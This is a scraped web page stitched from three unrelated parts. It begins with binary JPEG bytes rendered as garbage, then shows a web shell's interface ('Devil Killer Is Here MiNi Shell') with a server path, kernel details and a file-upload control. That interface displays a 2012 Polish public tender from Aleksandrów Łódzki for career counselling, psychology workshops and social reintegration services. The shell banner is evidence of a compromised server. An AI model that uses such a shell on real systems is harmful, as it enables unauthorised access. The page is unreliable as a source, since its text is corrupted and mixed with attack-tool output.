JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120418/123012-N-2012.html

<p class="kh_header"><b>Aleksandrów Łódzki: Przedmiotem zamówienia jest zorganizowanie  i przeprowadzenie warsztatów aktywizujących, zajęć indywidualnych  oraz  aktywizacji w ramach reintegracji społecznej i zawodowej  w Centrum Integracji Społecznej (CIS) zgodnie z ustawą z dnia 13.06.2003 r. o zatrudnieniu socjalnym z późniejszymi zmianami ( tj. Dz. U. z 2011 r. nr 43 poz. 225 z późn. zm. ) dla uczestników projektu systemowego Nowe Perspektywy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego . Przedmiot zamówienia składa się z trzech części.</b><br>
<b>Numer ogłoszenia: 123012 - 2012; data zamieszczenia: 18.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Piotrkowska 4/6, 95-070 Aleksandrów Łódzki, woj. łódzkie, tel. 042 7121611, faks 042 7121611.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zorganizowanie  i przeprowadzenie warsztatów aktywizujących, zajęć indywidualnych  oraz  aktywizacji w ramach reintegracji społecznej i zawodowej  w Centrum Integracji Społecznej (CIS) zgodnie z ustawą z dnia 13.06.2003 r. o zatrudnieniu socjalnym z późniejszymi zmianami ( tj. Dz. U. z 2011 r. nr 43 poz. 225 z późn. zm. ) dla uczestników projektu systemowego Nowe Perspektywy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego . Przedmiot zamówienia składa się z trzech części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie  i przeprowadzenie warsztatów aktywizujących, zajęć indywidualnych  oraz  aktywizacji w ramach reintegracji społecznej i zawodowej  w Centrum Integracji Społecznej (CIS) zgodnie z ustawą z dnia 13.06.2003 r. o zatrudnieniu socjalnym z późniejszymi zmianami ( tj. Dz. U. z 2011 r. nr 43 poz. 225 z późn. zm. ) dla uczestników projektu systemowego Nowe Perspektywy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego . Przedmiot zamówienia składa się z trzech części. Część I. Moduł I osoby po raz pierwszy zrekrutowane do projektu.Warsztaty aktywizujące, zajęcia indywidualne w ramach projektu systemowego Nowe Perspektywy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego dla osób bezrobotnych, nieaktywnych zawodowo w tym niepełnosprawnych, zatrudnionych  w niekorzystnej sytuacji zdolnych do podjęcia aktywizacji społecznej i zawodowej - wszyscy zamieszkujący tereny miejskie i wiejskie  gminy Aleksandrów Łódzki. Doradztwo zawodowe warsztaty, konwersatoria z dyplomowanym doradcą zawodowym i praktykującym w ciągu ostatnich minionych minimum 2 latach, doradca okazuje Zmawiającemu dyplom uprawniający do pełnienia roli doradcy zawodowego i dokumentuje praktykę zawodową,3 grupy x 30 h każda po 15 osób łącznie 90 h, poruszane tematy: charakterystyka i wymagania współczesnego rynku pracy, nauka tworzenia dokumentów aplikacyjnych z naciskiem na pisanie CV i listu motywacyjnego, nauka prowadzenia rozmowy kwalifikacyjnej, inne wynikające  z potrzeb czy diagnozy grupy, czas realizacji najdalej do 31.07.2012 r. wg. załączonego planu zajęć, który w ciągu 3 dni od daty podpisania umowy może być poddany weryfikacji zgodnie z możliwościami Wykonawcy i Zamawiającego. Doradztwo zawodowe indywidualne zakończone opracowaniem Indywidualnego Planu Działania (IPD), doradztwo realizuje i IPD opracowuje doradca zawodowy praktykujący w ciągu  ostatnich minionych minimum 2 latach doradca okazuje Zmawiającemu dyplom uprawniający do pełnienia roli doradcy zawodowego i dokumentuje praktykę zawodową,45 osób x 6 h łącznie 270 h.realizacja najdalej do 30.06.2012 r. wg. indywidualnie ustalonych spotkań zgodnie z możliwościami uczestników oraz wykonawcy, oraz możliwościami lokalowymi Zamawiającego, wykonawca w ciągu 7 dni od daty zakończenia pracy z uczestnikami projektu doręcza Zamawiającemu 45 IPD każdy oznaczony logo projektu. Kompetencje psychospołeczne warsztaty, konwersatoria z mgr psychologii praktykującym w ciągu  ostatnich minionych minimum 2 latach, psycholog okazuje Zmawiającemu dyplom uprawniający do pełnienia roli psychologa i dokumentuje praktykę zawodową, 3 grupy x 30 h każda po 15 osób łącznie 90 h, poruszane tematy: trening kompetencji społecznych, zarządzanie czasem, zarządzanie stresem, rozwiązywanie konfliktów, budowanie poczucia własnej wartości, rozwijanie aktywnych postaw, inne wynikające  z potrzeb czy diagnozy grupy, czas realizacji najdalej do 31.07.2012 r. wg. załączonego planu zajęć, który w ciągu 3 dni od daty podpisania umowy może być poddany weryfikacji zgodnie  możliwościami Wykonawcy i Zamawiającego. Kompetencje psychospołeczne indywidualna diagnoza psychologiczna, badania realizuje i diagnozy opracowuje mgr psychologii praktykujący w ciągu  ostatnich minionych minimum 2 latach, psycholog okazuje Zmawiającemu dyplom uprawniający do pełnienia roli psychologa na podstawie którego zostaną zakupione przez Zamawiającego niżej wymienione  testy psychologiczne, ponadto dokumentuje praktykę zawodową , 45 osób x 6 h łącznie 270 h, Zamawiający udostępnia testy KKS, CISS, PKIE, FCZ-KT i pomoce do ich analizy ,realizacja najdalej do 31.08.2012 r. wg. indywidualnie ustalonych spotkań zgodnie z możliwościami uczestników oraz Wykonawcy, oraz możliwościami lokalowymi Zamawiającego,wykonawca w ciągu 7 dni od daty zakończenia pracy z uczestnikami projektu doręcza Zamawiającemu 45 indywidualnych diagnoz psychologicznych - każda oznaczona logo projektu. Edukacja zdrowotna w zakresie profilaktyki problematyki uzależnień warsztaty z instruktorem do spraw uzależnień praktykującym w ciągu  ostatnich minionych minimum 2 latach; instruktor okazuje Zmawiającemu certyfikat uprawniający do prowadzenia zajęć ww. zakresie i dokumentuje praktykę zawodową,3 grupy x 15 h każda po 15 osób łącznie 45 h, poruszana tematyka: nowe uzależnienia, alkoholizm, lekomania, inne wynikające  z potrzeb czy diagnozy grupy, leczenie uzależnień, czas realizacji najdalej do 31.07.2012 r. wg. załączonego planu zajęć, który w ciągu 3 dni od daty podpisania umowy może być poddany weryfikacji zgodnie z możliwościami Wykonawcy i Zamawiającego. Część II. Moduł II osoby powracające, które uczestniczyły w projekcie w latach poprzednich 2008 lub 2009 lub  2010 lub 2011. Warsztaty aktywizujące, zajęcia indywidualne w ramach projektu systemowego Nowe Perspektywy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego dla osób bezrobotnych, nieaktywnych zawodowo w tym niepełnosprawnych, zatrudnionych  w niekorzystnej sytuacji zdolnych do podjęcia aktywizacji społecznej i zawodowej - wszyscy zamieszkują tereny miejskie oraz wiejskie  gminy Aleksandrów Łódzki. Osoby te  są aktywne w dążeniu do usamodzielnienia i rozwoju życiowego oraz zawodowego ale nadal nie mogą sprecyzować projektu zawodowego, brakuje im orientacji zawodowej zarówno w odniesieniu do swoich możliwości zawodowych, jak też do wymagań i oferty rynku pracy. Doradztwo zawodowe warsztaty, konwersatoria z doradcą zawodowym i praktykującym w ciągu  ostatnich minionych minimum 2 latach; doradca okazuje Zmawiającemu dyplom uprawniający do pełnienia roli doradcy zawodowego i dokumentuje praktykę zawodową:1 grupa x 24 h 12 osób, poruszana tematyka: metoda edukacyjna w doradztwie zawodowym  adresowana do osób, które są aktywne w dążeniu do usamodzielnienia i rozwoju życiowego oraz zawodowego ale nadal nie mogą sprecyzować projektu zawodowego, brakuje im orientacji zawodowej zarówno w odniesieniu do swoich możliwości zawodowych, jak też do wymagań i oferty rynku pracy; etapy procesu decyzyjnego, czas realizacji najdalej do 31.08.2012 r. wg. załączonego planu zajęć, który w ciągu 3 dni od daty podpisania umowy może być poddany weryfikacji zgodnie z możliwościami Wykonawcy i Zamawiającego.  Kompetencje psychospołeczne warsztaty, konwersatoria z mgr psychologii regularnie praktykującym w ciągu  ostatnich minionych minimum 2 latach; psycholog okazuje Zmawiającemu dyplom uprawniający do pełnienia roli psychologa i dokumentuje praktykę zawodową, 1 grupa 15 h 12 osób, poruszana tematyka: trening asertywności adresowany do osób, które są aktywne w dążeniu do usamodzielnienia i rozwoju życiowego oraz zawodowego ale nadal nie mogą sprecyzować projektu zawodowego, brakuje im orientacji zawodowej zarówno w odniesieniu do swoich możliwości zawodowych, jak też do wymagań i oferty rynku pracy; etapy procesu decyzyjnego. czas realizacji najdalej do 31.08.2012 r. wg. załączonego planu zajęć, który w ciągu 3 dni od daty podpisania umowy może być poddany weryfikacji zgodnie z możliwościami Wykonawcy i Zamawiającego. Coaching życiowy indywidualny prowadzony przez coachera, który okazuje się dyplomem z odbytego szkolenia trwającego minimum 120 h, oraz dokumentuje minimum 600 h praktykę  ,12 osób x 10 h łącznie 120 h, realizacja najdalej do 31.10.2012 r. wg. indywidualnie ustalonych spotkań zgodnie z możliwościami uczestników oraz Wykonawcy, oraz możliwościami lokalowymi Zamawiającego,Wykonawca w ciągu 7 dni od daty zakończenia pracy z uczestnikami projektu doręcza Zamawiającemu12 indywidualnych diagnoz/opinii - każde oznaczone logo projektu. Plan zajęć warsztatowych. Z uwagi na uwarunkowania proceduralne lubi organizacyjne, Zamawiający zastrzega możliwość przesunięcia terminu rozpoczęcia zajęć z tym, że zajęcia muszą odbyć się najdalej do 31.08.2012 r. Zamawiający zastrzega możliwość zmiany miejsca realizacji zajęć z tym, że będzie ono zlokalizowane na terenie Aleksandrowa Łódzkiego.
Legenda 
Moduł I  M I,Moduł II  M II,M I - G I   15 osób,M I - G II   15 osób - w tym 10 osób zamieszkujących na  terenach wiejskich i wymagających transportowania tam i z powrotem z wymienionych wsi : Księstwo, Nakielnica, Chrośno, Prawęcice, Krzywa Wieś, Ciężków, Adamów Nowy, Łobódź,; do zorganizowania transportu zobowiązany jest  Wykonawca. M I - G III   15 osób. M II - 12 osób - w tym 4 osoby zamieszkujące na  terenach wiejskich i wymagające transportowania tam i z powrotem z wymienionych wsi: Chrośno, Krasnodęby Stare, Adamów Stary; do zorganizowania transportu zobowiązany jest  Wykonawca. Warsztaty:
Kp - kompetencje psychospołeczne  M I plus M II
Dz - doradztwo zawodowe   M I plus M II
Uz - uzależnienia M I
Miejsce realizacji zajęć: 
M I G I - Centrum Pomocy Rodzinie i Usług Socjalnych (CPRiUS) Aleksandrów Łódzki ul. Warszawska 10
M I G II; M I G III; M II - Środowiskowy Dom Samopomocy (ŚDS) Aleksandrów Łódzki ul. Piotrkowska 4/6 piętro II
Czas trwania zajęć:
Od poniedziałku do piątku w godzinach 16.00 - 19.15 w tym 15 minut przerwa na posiłek
14 maj  2012 - 01 czerwiec 2012Data	Dzień tygodnia	Godzinaod  do 	M I G I15 os.CPRiUSM IG II - 15 os.ŚDS	M I G III - 15 os.ŚDS	M II - 12 osŚDS
mała sala14.05.2012	Poniedz	16.00-19.15	Kp	Dz	Uz	-
15. 05.2012	Wtorek	16.00-19.15	Kp	Dz	Uz	-
16. 05.2012	Środa	16.00-19.15	Kp	Dz	Uz	-
17. 05.2012	Czwartek	16.00-19.15	Kp	Dz	Uz	-
18. 05.2012	Piątek	16.00-19.15	Kp	Dz	Uz	-
19. 05.2012	Sobota	x	x	x	x	x
20. 05.2012	Niedziela	x	x	x	x	x
21. 05.2012	Poniedz	16.00-19.15	Dz	Kp	-	
22. 05.2012	Wtorek	16.00-19.15	Dz	Kp	-	
23. 05.2012	Środa	16.00-19.15	Dz	Kp	-	
24. 05.2012	Czwartek	16.00-19.15	Dz	Kp	-	
25. 05.2012	Piątek	16.00-19.15	Dz	Kp	-	
26. 05.2012	Sobota	x	x	x	x	x
27. 05.2012	Niedziela	x	x	x	x	x
28. 05.2012	Poniedz	16.00-19.15	Uz	-	Kp	
29. 05.2012	Wtorek	16.00-19.15	Uz	-	Kp	
30. 05.2012	Środa	16.00-19.15	Uz	-	Kp	
31. 05.2012	Czwartek	16.00-19.15	Uz	-	Kp	
01.06.2012	Piątek	16.00-19.15	Uz	-	Kp	
11 czerwiec 2012 - 30 czerwiec 2012
Data	Dzień tygodnia	Godzinaod  do 	M I G I -15 osCPRiUSM I G II - 15 osŚDS	MI G III - 15 osŚDS	M II - 12 os.ŚDSmała sala
11.06.2012	Poniedz	16.00-19.15	Dz	Uz	Kp	Dz
12.06.2012	Wtorek	16.00-19.15	Dz	Uz	Kp	Dz
13.06.2012	Środa	16.00-19.15	Dz	Uz	Kp	Dz
14.06.2012	Czwartek	16.00-19.15	Dz	Uz	Kp	Dz
15.06.2012	Piątek	16.00-19.15	Dz	Uz	Kp	Dz
16.06.2012	Sobota	x	x	x	x	x
17.06.2012	Niedziela	x	x	x	x	x
18.06.2012	Poniedz	16.00-19.15	Kp		Dz	Dz
19.06.2012	Wtorek	16.00-19.15	Kp		Dz	Dz
20.06.2012	Środa	16.00-19.15	Kp		Dz	Dz
21.06.2012	Czwartek	16.00-19.15	Kp		Dz	-
22.06.2012	Piątek	16.00-19.15	Kp		Dz	-
23.06.2012	Sobota	x	x	x	x	x
24.06.2012	Niedziela	x	x	x	x	x
25.06.2012	Poniedz	16.00-19.15		Kp	Dz	-
26.06.2012	Wtorek	16.00-19.15		Kp	Dz	-
27.06.2012	Środa	16.00-19.15		Kp	Dz	-
28.06.2012	Czwartek	16.00-19.15		Kp	Dz	-
29.06.2012	Piątek	16.00-19.15		Kp	Dz	-
30.06.2012	sobota	x	x	x	x	x
01 lipiec  2012 - 31 lipiec 2012
Data	Dzień tygodnia	Godzinaod  do 	M I G I - 15 os.CPRiUS	M I G II - 15 os.ŚDS	M I G III - 15 os.ŚDS	M II - 12 os.ŚDS
mała sala
01.07.2012	Niedziela 	x	x	x	x	x
02.07.2012	Poniedz	16.00-19.15	-	Dz		Kp
03.07.2012	Wtorek	16.00-19.15	-	Dz		Kp
04.07.2012	Środa	16.00-19.15	-	Dz		Kp
05.07.2012	Czwartek	16.00-19.15	-	Dz		Kp
06.07.2012	Piątek	16.00-19.15	-	Dz		Kp
07.07.2012	Sobota	x	x	x	x	x
08.07.2012	Niedziela	x	x	x	x	x
09.07.2012	Poniedz	16.00-19.15				
10.07.2012	Wtorek	16.00-19.15				
11.07.2012	Środa	16.00-19.15				
12.07.2012	Czwartek	16.00-19.15				
13.07.2012	Piątek	16.00-19.15				
14.07.2012	Sobota	x	x	x	x	x
15.07.2012	Niedziela	x	x	x	x	x
16.07.2012	Poniedz	16.00-19.15				
17.07.2012	Wtorek	16.00-19.15				
18.07.2012	Środa	16.00-19.15				
19.07.2012	Czwartek	16.00-19.15				
20.07.2012	Piątek	16.00-19.15				
21.07.2012	Sobota	x	x	x	x	x
22.07.2012	Niedziela	x	x	x	x	x
23.07.2012	Poniedz	16.00-19.15				
24.07.2012	Wtorek	16.00-19.15				
25.07.2012	Środa	16.00-19.15				
26.07.2012	Czwartek	16.00-19.15				
27.07.2012	Piątek	16.00-19.15				
28.07.2012	Sobota	x	x	x	x	x
29.07.2012	Niedziela	x	x	x	x	x
30.07.2012	Poniedz	16.00-19.15				
31.07.2012	Wtorek	16.00-19.15				
Część wspólna dla warsztatów
Zamawiający udostępnia pomieszczenia do realizacji zajęć wg. załączonego planu i we wskazanych miejscach, 2 laptopy, 1 projektor, 2 ekrany, 2 flipcharty, papier do flipchart, flamastry, kserokopiarkę, Internet przewodowy.Zajęcia w godzinach 16:00-19:15. 1 spotkanie trwa 3 godziny plus 15 minut przerwa na posiłek i posiłek oraz kawa/herbata dla Zamawiający zastrzega sobie prawo skierowania innej ilości osób na poszczególne rodzaje zajęć. Zamawiający opracowuje listy obecności beneficjentów ostatecznych. Zamawiający przekazuje wykonawcy logo projektu. Wykonawca jest zobowiązany do zorganizowania transportu tam i z powrotem dla osób zamieszkujących tereny wiejskie: Księstwo, Nakielnica, Chrośno, Prawęcice, Krzywa Wieś, Ciężków, Adamów Nowy, Łobódź.  Są to osoby z Modułu I grupa II (M I G II) i osoby z Modułu II (M II).Wykonawca przed rozpoczęciem zajęć jest zobowiązany zapoznać uczestników z ich szczegółowym programem. Dla każdego uczestnika zajęć Wykonawca przekazuje materiał dydaktyczny oznaczony logo projektu jeden egzemplarz lub jeden komplet  przekazuje Zamawiającemu. Wykonawca przeprowadza wśród uczestników zajęć ocenę merytoryczną przebiegu zajęć na podstawie ankiety oceniającej ankietę dostarcza Zamawiający. Wykonawca w ciągu 7 dni od daty zakończenia pracy z każdą grupą opracowuje opis procesu grupowego i doręcza Zamawiającemu - opis oznaczony jest logo projektu. Część wspólna dla indywidualnych zajęć:Zamawiający może udostępnić pomieszczenia do realizacji zajęć indywidualnych: jedno w godzinach 9:00-15:00 i 16:00-18:00 do 31.08.2012 r. - dwa pomieszczenia do realizacji zajęć indywidualnych w godzinach 9:00-15:00 i 16:00-18:00 od 1.09.2012 r. do 31.10.2012 r. Spotkania są realizowane wg. indywidualnych ustaleń między beneficjentem ostatecznym a realizującym usługę. Zamawiający opracowuje listy obecności beneficjentów ostatecznych i przekazuje Wykonawcy. Zamawiający zastrzega sobie prawo skierowania innej ilości osób na poszczególne rodzaje zajęć. Zamawiający przekazuje wykonawcy logo projektu. Łączenie uczestnictwa tego samego beneficjenta ostatecznego jednocześnie w warsztatach i zajęciach indywidualnych jest niedopuszczalne. Część III. Usługa prowadzenia aktywizacji w ramach reintegracji społecznej i zawodowej  w Centrum Integracji Społecznej (CIS) zgodnie z ustawą z dnia 13.06.2003 r. o zatrudnieniu socjalnym z późniejszymi zmianami (tj. Dz. U. z 2011 r. nr 43 poz. 225 z późn. zm.) w okresie 6 miesięcznym począwszy od 01.06.2012 r. dla max 25 osób uczestniczących w projekcie systemowym Nowe Perspektywy. Wykonawca w okresie 6 miesięcznych zajęć rozpoczynających się od 01.06.2012 r. zobowiązuje się do zorganizowania i przeprowadzenia działań aktywizacyjnych według niżej podanego programu:  Warsztatów rozwijających umiejętności osobiste i społeczne według poniższego programu Zarządzanie czasem 30h x 1 grupa x 25 osób. Cel: nauka gospodarowania czasem prywatnym i czasem pracy, bank czasu. Prowadzi 2 szkolących w zależności od możliwości mogą to być pedagodzy lub  psycholodzy lub  socjolodzy. Zależności społeczno-ekonomiczne na współczesnym rynku pracy 30h x 1 grupa x 25 osób. Cel: zapoznanie się z elementami mechanizmów rynkowych w gospodarce wolnorynkowej. Prowadzi 2 szkolących ekonomistów.Formy zatrudnienia na otwartym rynku pracy 18h x 1 grupa x 25 osób. Cel: poznanie form zatrudnienia w gospodarce wolnorynkowej. Prowadzi 1 szkolący z wykształceniem prawniczym lub ekonomicznym . Socjo-filozofia 30h x 1 grupa x 25 osób. Cel: wspieranie aktywizacji zawodowej w celu budowania i kształtowania postaw pożądanych społecznie i zawodowo. Prowadzi 2 szkolących - psycholog i pedagog. Indywidualnego poradnictwa charakteryzującego osobę i ustalającego ścieżkę rozwoju zawodowego 25 osób każda 5h. Cel: poznanie samego siebie, opracowanie indywidualnego planu rozwoju zawodowego i społecznego. Prowadzi doradca zawodowy lub psycholog.Kursu obsługi komputera i Internetu  z zapewnieniem samodzielnego stanowiska przy jednostce komputerowej dla osób uczestniczących.  Wykonawca prowadzi dwie edycje kursu z uwagi na zróżnicowane umiejętności osób uczestniczących, z podziałem na kurs podstawowy i zaawansowany. Sugerowany podział 60h x 1 grupa 12 osób oraz 60h x 1 grupa x 13 osób. Cel: dostosowanie umiejętności osób uczestniczących do potrzeb globalnego rynku pracy. Prowadzi osoba z wykształceniem wyższym i doświadczeniem w prowadzeniu kursów komputerowych dla osób wykluczonych społecznie.Trzech szkoleń przysposabiających do wykonywania czynności zawodowych dla 25 osób aktywizowanych zawodowo w ramach CIS. Szkolenia kursowe zostaną  wybrane z uwzględnieniem potrzeb lokalnego rynku pracy oraz predyspozycji osób aktywizowanych zawodowo określonych dla każdej z nich w ramach Indywidualnego Planu Zatrudnienia Socjalnego:kurs pracownik gospodarczy tj. elementy sprzątania wewnątrz, na zewnątrz i utrzymanie terenów zielonych 60h x 1 grupa min. 5 osób max 10 osób  kurs sprzedawca kasjer w tym  profesjonalna obsługa klienta 60h x 1 grupa min. 5 osób max 10 osób, kurs opiekunka/opiekun domowy tj. sprawowanie opieki nad osobami zależnymi z przeprowadzeniem podstawowego szkolenia medycznego łącznie 60h x 1 grupa min. 5 osób max 10 osób.  Wykonawca wydaje osobom uczestniczącym, Certyfikaty z logo projektu Nowe Perspektywy potwierdzające udział w aktywizacji prowadzonej w CIS, zestaw logo przekazuje Zamawiający. Zaświadczenia na drukach MEN o ukończeniu szkolenia przysposabiającego do czynności zawodowych.  Część wspólna dla usługi prowadzenia aktywizacji w Centrum Integracji Społecznej (CIS), Zamawiający wymaga, aby aktywizacja w CIS prowadzone były na terenie miasta Aleksandrów Łódzki, wyjątek stanowią wyjazdy kulturalne: jeden do łódzkiego teatru, drugi do łódzkiego kina dla 25 osób uczestniczących i 1 osoby opiekującej się. Wykonawca zapewnia organizację i opłatę za transport tam i z powrotem, a także za bilety wstępu. Wykonawca organizuje i zapewnia: serwis kawowy dla 25 osób uczestniczących w kursach, warsztatach  i szkoleniach w skład, którego wchodzą: susz konferencyjny, kawa, herbata, cukier, cytryna, śmietanka do kawy. Wykonawca zapewnia naczynia do konsumpcji podczas serwisu kawowego, codzienny ciepły posiłek gwarantowany w ustawie o zatrudnieniu socjalnym, przeprowadzenie wstępnych badań lekarskich przed podjęciem zatrudnienia socjalnego, strój roboczy (odzież i obuwie) jeśli wymaga tego uczestnictwo w szkoleniu przysposabiających do wykonywania czynności zawodowych , wypłatę świadczenia integracyjnego na podstawie przepisów ustawy o zatrudnieniu socjalnym w ramach realizowanej reintegracji społecznej i zawodowej,zgłoszenie do ubezpieczenia od NNW, szkolenie bhp i ppoż trwające 8h, sale na przeprowadzenie warsztatów, indywidualnych zajęć, szkoleń kursowych  z dostępem do sanitariatów i innych mediów ,pomieszczenia dla personelu obsługi CIS w Aleksandrowie Łódzkim przez okres trwania CIS z dostępem do sanitariatów i innych mediów, personel obsługujący aktywizację w ramach reintegracji społecznej i zawodowej CIS w Aleksandrowie Łódzkim: jeden logista na rejon Aleksandrów Łódzki,  jeden pedagog , jeden doradca zawodowy, dwóch instruktorów zawodu. Wykonawca zapewnia obsługę personelu oraz kadry prowadzącej warsztaty, zajęcia indywidualne, kursy posiadających  wiedzę i doświadczenie w ich prowadzeniu.  Wykonawca w ciągu 7 dni od daty podpisania umowy przedstawia Zamawiającemu sugerowany plan zajęć na czerwiec 2012 roku.  Każdy następny plan strony ustalają w wyprzedzeniem tygodniowym przed rozpoczęciem zajęć..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 14.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
